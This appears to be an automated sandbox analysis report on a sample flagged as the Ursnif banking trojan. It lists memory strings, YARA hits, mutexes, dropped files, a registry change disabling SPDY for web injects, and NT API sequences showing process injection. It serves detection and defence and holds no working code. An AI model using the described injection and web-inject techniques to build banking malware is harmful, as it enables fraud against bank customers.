            Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
            Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
            Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
            Source: explorer.exe, 0000000F.00000002.541023752.00000000053A0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
            Source: RuntimeBroker.exe, 00000018.00000002.526157992.000001E7675B6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526121422.000001E76759F000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/spotify:
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
            Source: RuntimeBroker.exe, 00000018.00000002.526053578.000001E767517000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsnVersio
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000000F.00000002.525161524.0000000003710000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: explorer.exe, 0000000F.00000003.428010373.000000000EB97000.00000004.00000040.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: explorer.exe, 0000000F.00000002.541052132.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 1632, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 1632, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A390C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,0_2_020A390C
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A281E NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_020A281E
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A2429 NtMapViewOfSection,RtlNtStatusToDosError,0_2_020A2429
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A4B3A memset,GetProcAddress,NtWow64QueryInformationProcess64,0_2_020A4B3A
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A4E3B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,0_2_020A4E3B
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A4A6A NtQuerySystemInformation,RtlNtStatusToDosError,0_2_020A4A6A
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A2368 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_020A2368
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A167A GetProcAddress,NtWow64ReadVirtualMemory64,0_2_020A167A
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A2EAE memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,0_2_020A2EAE
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A1AD5 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,0_2_020A1AD5
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A285F memset,NtQueryInformationProcess,0_2_020A285F
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A1750 NtGetContextThread,NtGetContextThread,0_2_020A1750
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A52FC NtGetContextThread,0_2_020A52FC
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BD030 NtMapViewOfSection,13_2_005BD030
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B5080 NtAllocateVirtualMemory,13_2_005B5080
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BD148 NtQueryInformationProcess,13_2_005BD148
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B0C74 NtSetContextThread,13_2_005B0C74
            Source: C:\Windows\System32\control.exeCode function: 13_2_005CDCE8 NtReadVirtualMemory,13_2_005CDCE8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B84B8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,13_2_005B84B8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AB688 NtWriteVirtualMemory,13_2_005AB688
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BB700 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,13_2_005BB700
            Source: C:\Windows\System32\control.exeCode function: 13_2_005E1004 NtProtectVirtualMemory,NtProtectVirtualMemory,13_2_005E1004
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6D148 NtQueryInformationProcess,15_2_03B6D148
            Source: C:\Windows\explorer.exeCode function: 15_2_03B65080 NtAllocateVirtualMemory,15_2_03B65080
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6D030 NtMapViewOfSection,15_2_03B6D030
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6B700 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,15_2_03B6B700
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5B688 NtWriteVirtualMemory,15_2_03B5B688
            Source: C:\Windows\explorer.exeCode function: 15_2_03B52E38 RtlDeleteBoundaryDescriptor,RtlAllocateHeap,NtQuerySystemInformation,15_2_03B52E38
            Source: C:\Windows\explorer.exeCode function: 15_2_03B54554 NtQueryInformationProcess,15_2_03B54554
            Source: C:\Windows\explorer.exeCode function: 15_2_03B714A4 NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,15_2_03B714A4
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7DCE8 NtReadVirtualMemory,15_2_03B7DCE8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B60C74 NtSetContextThread,15_2_03B60C74
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E484B8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,18_2_00000232E0E484B8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4D148 NtQueryInformationProcess,18_2_00000232E0E4D148
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E71004 NtProtectVirtualMemory,NtProtectVirtualMemory,18_2_00000232E0E71004
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A21E3F NtQueryInformationProcess,37_2_02A21E3F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A13B34 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,37_2_02A13B34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0CED5 NtMapViewOfSection,RtlNtStatusToDosError,37_2_02A0CED5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A068A2 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree,37_2_02A068A2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A20CC4 memset,NtQueryInformationProcess,37_2_02A20CC4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A16C33 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,37_2_02A16C33
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0D9ED NtQuerySystemInformation,RtlNtStatusToDosError,37_2_02A0D9ED
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0CD70 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,37_2_02A0CD70
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A53480_2_020A5348
            Source: C:\Windows\System32\control.exeCode function: 13_2_005C788013_2_005C7880
            Source: C:\Windows\System32\control.exeCode function: 13_2_005C94B413_2_005C94B4
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BB70013_2_005BB700
            Source: C:\Windows\System32\control.exeCode function: 13_2_005CA04413_2_005CA044
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B406413_2_005B4064
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BF06413_2_005BF064
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B100413_2_005B1004
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B80FC13_2_005B80FC
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B708813_2_005B7088
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B690813_2_005B6908
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B910813_2_005B9108
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AE12413_2_005AE124
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AE9C013_2_005AE9C0
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BA9C413_2_005BA9C4
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BEAE813_2_005BEAE8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B72E413_2_005B72E4
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BFA9413_2_005BFA94
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B237813_2_005B2378
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B531813_2_005B5318
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AEBC813_2_005AEBC8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AD3F813_2_005AD3F8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005C53EC13_2_005C53EC
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BD39813_2_005BD398
            Source: C:\Windows\System32\control.exeCode function: 13_2_005BC39013_2_005BC390
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AABA813_2_005AABA8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005C646813_2_005C6468
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A7C0013_2_005A7C00
            Source: C:\Windows\System32\control.exeCode function: 13_2_005ABC9C13_2_005ABC9C
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A148C13_2_005A148C
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A3CAC13_2_005A3CAC
            Source: C:\Windows\System32\control.exeCode function: 13_2_005CA55013_2_005CA550
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B5D1413_2_005B5D14
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A35E813_2_005A35E8
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AE67C13_2_005AE67C
            Source: C:\Windows\System32\control.exeCode function: 13_2_005CD66413_2_005CD664
            Source: C:\Windows\System32\control.exeCode function: 13_2_005CF60413_2_005CF604
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AC6E413_2_005AC6E4
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A868813_2_005A8688
            Source: C:\Windows\System32\control.exeCode function: 13_2_005AA68413_2_005AA684
            Source: C:\Windows\System32\control.exeCode function: 13_2_005B476813_2_005B4768
            Source: C:\Windows\System32\control.exeCode function: 13_2_005A9F1C13_2_005A9F1C
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5ABA815_2_03B5ABA8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6C39015_2_03B6C390
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5D3F815_2_03B5D3F8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5E9C015_2_03B5E9C0
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5E12415_2_03B5E124
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7A04415_2_03B7A044
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6B70015_2_03B6B700
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5A68415_2_03B5A684
            Source: C:\Windows\explorer.exeCode function: 15_2_03B53CAC15_2_03B53CAC
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5BC9C15_2_03B5BC9C
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6D39815_2_03B6D398
            Source: C:\Windows\explorer.exeCode function: 15_2_03B753EC15_2_03B753EC
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5EBC815_2_03B5EBC8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6531815_2_03B65318
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6237815_2_03B62378
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6FA9415_2_03B6FA94
            Source: C:\Windows\explorer.exeCode function: 15_2_03B672E415_2_03B672E4
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6EAE815_2_03B6EAE8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B71A7815_2_03B71A78
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6A9C415_2_03B6A9C4
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6690815_2_03B66908
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6910815_2_03B69108
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6708815_2_03B67088
            Source: C:\Windows\explorer.exeCode function: 15_2_03B680FC15_2_03B680FC
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6100415_2_03B61004
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6F06415_2_03B6F064
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6406415_2_03B64064
            Source: C:\Windows\explorer.exeCode function: 15_2_03B59F1C15_2_03B59F1C
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6476815_2_03B64768
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5868815_2_03B58688
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5C6E415_2_03B5C6E4
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7F60415_2_03B7F604
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5E67C15_2_03B5E67C
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7D66415_2_03B7D664
            Source: C:\Windows\explorer.exeCode function: 15_2_03B535E815_2_03B535E8
            Source: C:\Windows\explorer.exeCode function: 15_2_03B65D1415_2_03B65D14
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7A55015_2_03B7A550
            Source: C:\Windows\explorer.exeCode function: 15_2_03B794B415_2_03B794B4
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5148C15_2_03B5148C
            Source: C:\Windows\explorer.exeCode function: 15_2_03B57C0015_2_03B57C00
            Source: C:\Windows\explorer.exeCode function: 15_2_03B7646815_2_03B76468
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E594B418_2_00000232E0E594B4
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5788018_2_00000232E0E57880
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3BC9C18_2_00000232E0E3BC9C
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E33CAC18_2_00000232E0E33CAC
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3148C18_2_00000232E0E3148C
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5646818_2_00000232E0E56468
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3D3F818_2_00000232E0E3D3F8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E37C0018_2_00000232E0E37C00
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E335E818_2_00000232E0E335E8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5A55018_2_00000232E0E5A550
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E45D1418_2_00000232E0E45D14
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3C6E418_2_00000232E0E3C6E4
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3E67C18_2_00000232E0E3E67C
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3A68418_2_00000232E0E3A684
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3868818_2_00000232E0E38688
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5D66418_2_00000232E0E5D664
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5F60418_2_00000232E0E5F604
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4476818_2_00000232E0E44768
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E39F1C18_2_00000232E0E39F1C
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4B70018_2_00000232E0E4B700
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4708818_2_00000232E0E47088
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4406418_2_00000232E0E44064
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4F06418_2_00000232E0E4F064
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E5A04418_2_00000232E0E5A044
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4100418_2_00000232E0E41004
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3E9C018_2_00000232E0E3E9C0
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4A9C418_2_00000232E0E4A9C4
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3E12418_2_00000232E0E3E124
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E480FC18_2_00000232E0E480FC
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4690818_2_00000232E0E46908
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4910818_2_00000232E0E49108
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4EAE818_2_00000232E0E4EAE8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E472E418_2_00000232E0E472E4
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4FA9418_2_00000232E0E4FA94
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E553EC18_2_00000232E0E553EC
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3EBC818_2_00000232E0E3EBC8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4D39818_2_00000232E0E4D398
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E3ABA818_2_00000232E0E3ABA8
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4237818_2_00000232E0E42378
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4C39018_2_00000232E0E4C390
            Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000232E0E4531818_2_00000232E0E45318
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A2367837_2_02A23678
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0A30F37_2_02A0A30F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0B34F37_2_02A0B34F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0C8A637_2_02A0C8A6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A03C8237_2_02A03C82
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0803837_2_02A08038
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A1092F37_2_02A1092F
            Source: 4.exe, 00000000.00000003.346569846.0000000003164000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4.exe
            Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msimg32.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@26/11@10/1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A01492 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next,37_2_02A01492
            Source: C:\Users\user\Desktop\4.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\AppXtcseJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\{13E4E2B9-561A-BD8D-F8F7-EA41AC1BBE05}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{65826E82-80D0-DF89-B269-B48306AD2867}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_01
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{EB412D51-4EEE-5521-B04F-6259E4F3B69D}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:240:120:WilError_01
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{47C6B356-FA4E-1192-3C6B-CED530CFE2D9}
            Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F3013777-B6DE-9DC6-58D7-4A210CFB1EE5}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{9344C259-D600-3D42-7877-6AC12C9B3E85}
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2880.binJump to behavior
            Source: 4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\control.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
